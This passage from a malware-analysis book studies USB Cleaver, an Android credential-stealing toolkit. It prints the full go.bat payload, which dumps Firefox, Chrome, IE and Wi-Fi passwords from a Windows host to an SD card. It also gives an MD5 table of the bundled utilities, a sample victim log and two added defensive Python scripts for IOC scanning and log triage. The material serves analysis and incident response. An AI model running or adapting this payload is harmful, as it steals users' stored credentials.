Android Malware and Analysis by Tim Strazzere, Jose Andre Morales, Manu Quintans, Shane Hartman, Ken Dunham


Case Study Examples
:: Locate the removable drive by probing drive letters for the marker file
IF EXIST f:\usbcleaver\config\Drive_Location.cfg SET flshdrv=f:
IF EXIST %flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO FlshDrvFound
IF EXIST e:\usbcleaver\config\Drive_Location.cfg SET flshdrv=e:
IF EXIST %flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO FlshDrvFound
IF EXIST d:\usbcleaver\config\Drive_Location.cfg SET flshdrv=d:
IF EXIST %flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO FlshDrvFound
IF EXIST c:\usbcleaver\config\Drive_Location.cfg SET flshdrv=c:
IF EXIST %flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO FlshDrvFound
IF EXIST b:\usbcleaver\config\Drive_Location.cfg SET flshdrv=b:
IF EXIST %flshdrv%\usbcleaver\config\Drive_Location.cfg GOTO FlshDrvFound
GOTO END
:FlshDrvFound
:: Checks to see if the payload is disarmed (presence of Disarm_Payload.cfg ends the run)
IF NOT EXIST %flshdrv%\usbcleaver\config\Disarm_Payload.cfg GOTO SkipDisarm
IF EXIST %flshdrv%\usbcleaver\config\Disarm_Payload.cfg GOTO End
:SkipDisarm
:: Sets variables and paths to clean up pathnames later on
IF NOT EXIST %flshdrv%\usbcleaver\logs\%computername% MD %flshdrv%\usbcleaver\logs\%computername%
SET t=%time:~0,2%_%time:~3,2%_%time:~6,2%
SET logdir="%flshdrv%\usbcleaver\logs\%computername%"
SET log="%flshdrv%\usbcleaver\logs\%computername%\%computername%-[%t%].log"
SET tmplog="%flshdrv%\usbcleaver\logs\%computername%\%computername%_TEMP.log"
SET progdir="%flshdrv%\usbcleaver\system\"
SET config="%flshdrv%\usbcleaver\config\"
SET installdir="%flshdrv%\usbcleaver\system\install"
SET /p eipurl=<"%flshdrv%\usbcleaver\config\External_IP.cfg"
:: Header information (the first ECHO creates the log with >, every later line appends with >>)
ECHO ----------------------------------------------> %log% 2>&1
ECHO USB Cleaver Payload [Time Started: %DATE% %TIME%] >> %log% 2>&1
ECHO --------------------------------------------->> %log% 2>&1
ECHO Computer Name is: %computername% and the Logged on User Is: %username% >> %log% 2>&1
ECHO --------------------------------------------->> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
ECHO + [System info] + >> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
IPCONFIG /all >> %log% 2>&1
:: Each dump section runs a third-party password-recovery tool with /stext, appends its
:: text output to the main log, then deletes the temporary file
ECHO --------------------------------------------->> %log% 2>&1
Echo +-----------------------------------------+ >> %log% 2>&1
Echo + [Dump Firefox PW] + >> %log% 2>&1
Echo +-----------------------------------------+ >> %log% 2>&1
%progdir%\PasswordFox.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%*%log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO --------------------------------------------->> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
ECHO + [Dump Chrome PW] + >> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
.\ChromePass.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%*%log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO --------------------------------------------->> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
ECHO + [Dump IE PW] + >> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
.\iepv.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%*%log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO --------------------------------------------->> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
ECHO + [Dump WIFI PW] + >> %log% 2>&1
ECHO +-----------------------------------------+ >> %log% 2>&1
.\WirelessKeyView.exe /stext %tmplog% >> %log% 2>&1
COPY %log%+%tmplog%*%log% >> NUL
DEL /f /q %tmplog% >NUL
ECHO. >> %log% 2>&1
ECHO --------------------------------------------->> %log% 2>&1
ECHO USB Cleaver Payload [Time Finished: %DATE% %TIME%] >> %log% 2>&1
ECHO --------------------------------------------->> %log% 2>&1
:: Target of the GOTO END / GOTO End jumps above; the printed listing stops before it
:END
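The payload above invokes its credential-dumping utilities by file name from usbcleaver\system, and Table 9.1 later in this section gives the MD5 of each utility shipped in usbcleaver.zip. A responder who finds a suspect SD card, or a copy of the archive, can match file contents against that list regardless of what the files are called. The Python scanner below is an added example and is not code from the book or from USB Cleaver; it embeds the Table 9.1 hashes and assumes only the standard library. MD5 is used because those are the values the table provides: it identifies these exact builds, but, being collision-prone and easily changed by repacking, a clean result means only that these specific files are absent, not that the toolkit is.

```python
import hashlib
import sys
from pathlib import Path

# MD5 values copied from Table 9.1 of the case study (the utilities shipped in
# usbcleaver.zip), keyed by hash so that matching ignores the on-disk name.
USBCLEAVER_MD5 = {
    "95d2e5efc50749783eea9adf05f8030f": "usbcleaver.zip",
    "c6ac67f4076ca431acc575912c194245": "PORTQRY.EXE",
    "a5a16a3d55ab8d576ed0d1f07fb139ea": "PRODUKEY.EXE",
    "35861f4ea9a8ecb6c357bdb91b7df804": "PSPV.EXE",
    "fa252d9b4bb354b4dca76e402d2a419e": "RAR.EXE",
    "06e54162b8b0324232fbf820c0c22496": "servpw64.exe",
    "e846285b19405b11c8f19c1ed0a57292": "softokn3.dll",
    "f78ab032cc2b1d814c4a90dc224d696d": "ssleay32.dll",
    "4bf24777ec95dcb3e03769def6816518": "WGET.EXE",
    "6f4af9a8413e2180836e12554c5a10a9": "WIFIKE.EXE",
    "de64eeda1ca624c456c03c109feaab43": "WirelessKeyView.exe",
    "4e3c3ed0b6828d9c3058a16673ed1a6d": "WUL.EXE",
    "885e9eb42889ca547f4e3515dcde5d3d": "7za.exe",
    "5476a6557e78ce7b5d1b43fe584b40f4": "BulletsPassView.exe",
    "7b641e136f446860c48a3a870523249f": "ChromePass.exe",
    "03dfd337bfc127a7ff64bc75ebdce8e2": "Drive.ico",
    "1255ff2d9c66f0d17cf6d15302c8f996": "fc.exe",
    "abc6379205de2618851c4fcbf72112eb": "HideConsole.exe",
    "b2d5574738cb4e772a1b849695c19a2a": "iehv.exe",
    "aa0ee1b153b075517c775cc260c7c8f8": "LIBEAY32.DLL",
    "a323196665376c39c3f736d2cd737cf9": "libssl32.dll",
    "a65749ee53f55d034e8ccb057639c074": "lsremora64.dll",
    "72414dfb0b112c664d2c8d1215674e09": "nspr4.dll",
    "7ddbd64d87c94fd0b5914688093dd5c2": "nss3.dll",
    "398f515c4d202d9c9c1f884ac50bc72c": "PasswordFox.exe",
    "c73ec58b42e66443fafc03f3a84dcef9": "plc4.dll",
    "ee44d5d780521816c906568a8798ed2f": "plds4.dll",
    "736884655654624cd6fb4312e8ddbc63": "csrss.bat",
}


def md5_of_file(path, chunk=1 << 16):
    """Hex MD5 of a file, streamed so a large archive is not read into memory at once."""
    try:
        h = hashlib.md5(usedforsecurity=False)  # identification only, not integrity
    except TypeError:                           # Python < 3.9 has no such keyword
        h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_tree(root, iocs=USBCLEAVER_MD5):
    """Return one hit record for every file under root whose MD5 is in iocs.

    Matching is by content only, so a utility dropped under a different name is
    still found; 'renamed' records whether the on-disk name differs from the name
    the table gives for that hash.
    """
    wanted = {k.lower(): v for k, v in iocs.items()}
    root = Path(root)
    hits = []
    for path in sorted((p for p in root.rglob("*") if p.is_file()), key=str):
        digest = md5_of_file(path)
        known = wanted.get(digest)
        if known is not None:
            hits.append({"path": str(path.relative_to(root)), "md5": digest,
                         "ioc_name": known, "renamed": path.name.lower() != known.lower()})
    return hits


def has_cleaver_layout(root):
    """Structural indicator independent of hashes: the directory tree go.bat expects."""
    base = Path(root) / "usbcleaver"
    return any((base / sub).is_dir() for sub in ("config", "system", "logs"))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    print("usbcleaver directory layout present:", has_cleaver_layout(target))
    for hit in scan_tree(target):
        flag = " (renamed)" if hit["renamed"] else ""
        print(f"{hit['path']}  {hit['md5']}  -> {hit['ioc_name']}{flag}")
```

Run it against the mount point of the card (for example `python scan.py /mnt/sdcard`). A hit marked renamed means the tool was present under another name, which on its own is worth noting in the report; the layout check catches a card that carries the usbcleaver tree even when the utilities have been replaced by versions the table does not know.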
2. The Log Files button opens a view of the log files created during a successful run of go.bat. These files are located on the SD card under usbcleaver/logs.
3. The Download Payloads button downloads the utilities that actually perform the operations requested in the Enable/Disable payloads section. When selected it goes to the following URL, novaspirit.com/Downloads/, and downloads a single file called usbcleaver.zip.
Image 9.9 USB Cleaver download.
The file is stored on the SD card under usbcleaver/system. Once the download completes, a number of utilities are extracted to the same directory, where they are then ready for execution. Table 9.1 lists those utilities and their MD5 hashes.

Table 9.1 Utilities and MD5 Hash Values

FILE                  MD5 HASH
usbcleaver.zip        95d2e5efc50749783eea9adf05f8030f
PORTQRY.EXE           c6ac67f4076ca431acc575912c194245
PRODUKEY.EXE          a5a16a3d55ab8d576ed0d1f07fb139ea
PSPV.EXE              35861f4ea9a8ecb6c357bdb91b7df804
RAR.EXE               fa252d9b4bb354b4dca76e402d2a419e
servpw64.exe          06e54162b8b0324232fbf820c0c22496
softokn3.dll          e846285b19405b11c8f19c1ed0a57292
ssleay32.dll          f78ab032cc2b1d814c4a90dc224d696d
WGET.EXE              4bf24777ec95dcb3e03769def6816518
WIFIKE.EXE            6f4af9a8413e2180836e12554c5a10a9
WirelessKeyView.exe   de64eeda1ca624c456c03c109feaab43
WUL.EXE               4e3c3ed0b6828d9c3058a16673ed1a6d
7za.exe               885e9eb42889ca547f4e3515dcde5d3d
BulletsPassView.exe   5476a6557e78ce7b5d1b43fe584b40f4
ChromePass.exe        7b641e136f446860c48a3a870523249f
Drive.ico             03dfd337bfc127a7ff64bc75ebdce8e2
fc.exe                1255ff2d9c66f0d17cf6d15302c8f996
HideConsole.exe       abc6379205de2618851c4fcbf72112eb
iehv.exe              b2d5574738cb4e772a1b849695c19a2a
LIBEAY32.DLL          aa0ee1b153b075517c775cc260c7c8f8
libssl32.dll          a323196665376c39c3f736d2cd737cf9
lsremora64.dll        a65749ee53f55d034e8ccb057639c074
nspr4.dll             72414dfb0b112c664d2c8d1215674e09
nss3.dll              7ddbd64d87c94fd0b5914688093dd5c2
PasswordFox.exe       398f515c4d202d9c9c1f884ac50bc72c
plc4.dll              c73ec58b42e66443fafc03f3a84dcef9
plds4.dll             ee44d5d780521816c906568a8798ed2f
csrss.bat             736884655654624cd6fb4312e8ddbc63

When the device is plugged into a Windows machine, information is collected from that machine and stored in a data file on the SD card under logs. Following is an example of the information collected from the system.

-------------------------------------------------------------
USB Cleaver Payload
-------------------------------------------------------------
Computer Name is: lab1 and the Logged on User Is: Bob
+------------------------+
+ [System info] +
+------------------------+
Windows IP Configuration
Host Name................. : lab1
Primary Dns Suffix ....... :
Node Type................. : Hybrid
IP Routing Enabled........ : No
WINS Proxy Enabled........ : No
Ethernet adapter Ethernet:
Media State..................... : Media disconnected
Connection-specific DNS Suffix . :
Description..................... : Qualcomm Atheros AR8161 PCI-E Gigabit Ethernet Controller (NDIS 6.30)
Physical Address................ : 5C-F9-DD-E3-6F-E4
DHCP Enabled.................... : Yes
Autoconfiguration Enabled....... : Yes
Wireless LAN adapter Wi-Fi:
Connection-specific DNS Suffix . :
Description..................... : Dell Wireless 1703 802.11b|g|n (2.4GHz)
Physical Address................ : F4-B7-E2-AD-B1-C3
DHCP Enabled.................... : Yes
Autoconfiguration Enabled....... : Yes
Link-local IPv6 Address......... : fe80::c043:76c6:6984:8107%3(Preferred)
IPv4 Address.................... : 192.168.255.21(Preferred)
Subnet Mask..................... : 255.255.255.0
Lease Obtained.................. : Thursday, March 20
Lease Expires................... : Saturday, March 22
Default Gateway................. : 192.168.10.1
DHCP Server..................... : 192.168.10.2
DHCPv6 IAID..................... : 334804962
DHCPv6 Client DUID.............. : 00-01-00-01-18-C1-11-AF-5C-F9-DD-E3-6F-E4
DNS Servers..................... : 8.8.8.8
NetBIOS over Tcpip.............. : Enabled
---------------------------------------------------------
+----------------------------------+
+ [Dump Firefox PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump Chrome PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump WIFI PW] +
+----------------------------------+
---------------------------------------------------------
USB Cleaver Payload Finished
---------------------------------------------------------
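The log above follows the layout go.bat writes: a header naming the victim host and logged-on user, an ipconfig /all dump under the [System info] banner, then one banner per credential store. For triage the useful facts are which host the device was plugged into, that host's MAC and IPv4 addresses, and whether the dump sections contain anything at all (in the excerpt every dump section is empty, meaning the tool behind it wrote nothing). The parser below is an added example, not part of the book or of USB Cleaver. The sample log it embeds is constructed to mirror the excerpt: the host, user, MACs and IPv4 address are the ones printed above, while the timestamps and the single redacted line under the Chrome banner are made up to exercise the non-empty case.

```python
import re
from collections import OrderedDict

# Constructed sample modelled on the case-study excerpt. Host, user, MACs and
# IPv4 address are the values printed in the book; the timestamps and the one
# line under the Chrome banner are invented for this example.
SAMPLE_LOG = """\
-------------------------------------------------------------
USB Cleaver Payload [Time Started: Thu 03/20/2014 10:15:02.11]
-------------------------------------------------------------
Computer Name is: lab1 and the Logged on User Is: Bob
-------------------------------------------------------------
+------------------------+
+ [System info] +
+------------------------+
Windows IP Configuration
Host Name . . . . . . . . . . . . : lab1
Ethernet adapter Ethernet:
   Physical Address. . . . . . . . . : 5C-F9-DD-E3-6F-E4
Wireless LAN adapter Wi-Fi:
   Physical Address. . . . . . . . . : F4-B7-E2-AD-B1-C3
   IPv4 Address. . . . . . . . . . . : 192.168.255.21(Preferred)
---------------------------------------------------------
+----------------------------------+
+ [Dump Firefox PW] +
+----------------------------------+
---------------------------------------------------------
+----------------------------------+
+ [Dump Chrome PW] +
+----------------------------------+
Entry: intranet login (constructed sample line, credential redacted)
---------------------------------------------------------
USB Cleaver Payload [Time Finished: Thu 03/20/2014 10:15:09.48]
---------------------------------------------------------
"""

BANNER_RE = re.compile(r"^\+\s*\[(?P<name>[^\]]+)\]\s*\+$")
HOST_RE = re.compile(r"^Computer Name is:\s*(?P<host>\S+) and the Logged on User Is:\s*(?P<user>\S+)")
TIME_RE = re.compile(r"\[Time (?P<which>Started|Finished):\s*(?P<when>[^\]]+)\]")
MAC_RE = re.compile(r"Physical Address[ .]*:\s*(?P<mac>(?:[0-9A-Fa-f]{2}-){5}[0-9A-Fa-f]{2})")
IPV4_RE = re.compile(r"IPv4 Address[ .]*:\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})")


def parse_cleaver_log(text):
    """Parse one go.bat log into a dict of triage facts.

    'sections' maps each banner name to the lines written under it, in file
    order, so an empty list means the tool behind that banner emitted nothing.
    """
    report = {"host": None, "user": None, "started": None, "finished": None,
              "macs": [], "ipv4": [], "sections": OrderedDict()}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        # Blank lines, dash rules and the +----+ borders carry no data.
        if not line or set(line) <= {"+", "-"}:
            continue
        m = BANNER_RE.match(line)
        if m:
            current = m.group("name")
            report["sections"][current] = []
            continue
        m = HOST_RE.match(line)
        if m:
            report["host"], report["user"] = m.group("host"), m.group("user")
            continue
        m = TIME_RE.search(line)
        if m:
            report[m.group("which").lower()] = m.group("when").strip()
            continue
        m = MAC_RE.search(line)
        if m:
            report["macs"].append(m.group("mac").upper())
        m = IPV4_RE.search(line)
        if m:
            report["ipv4"].append(m.group("ip"))
        if current is not None:
            report["sections"][current].append(line)
    return report


def credential_sections(report):
    """Line count under every '... PW' banner; 0 means nothing was captured there."""
    return {name: len(lines) for name, lines in report["sections"].items()
            if name.upper().endswith("PW")}


def exposed_stores(report):
    """Dump sections that contain output, i.e. stores whose contents left the host."""
    return [name for name, count in credential_sections(report).items() if count > 0]


if __name__ == "__main__":
    r = parse_cleaver_log(SAMPLE_LOG)
    print(f"host={r['host']} user={r['user']} macs={r['macs']} ipv4={r['ipv4']}")
    print("stores with captured output:", exposed_stores(r) or "none")
```

Point it at every file under usbcleaver/logs/<computername>/ on a recovered card to build the list of affected hosts and the stores to reset credentials for. An empty dump section is evidence that the tool wrote nothing on that run, not proof that nothing was taken; a tool that failed to start, or a run that was interrupted, leaves the same gap.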
Whois
Domain Name: NOVASPIRIT.COM
Registry Domain ID: 96860153_DOMAIN_COM-VRSN
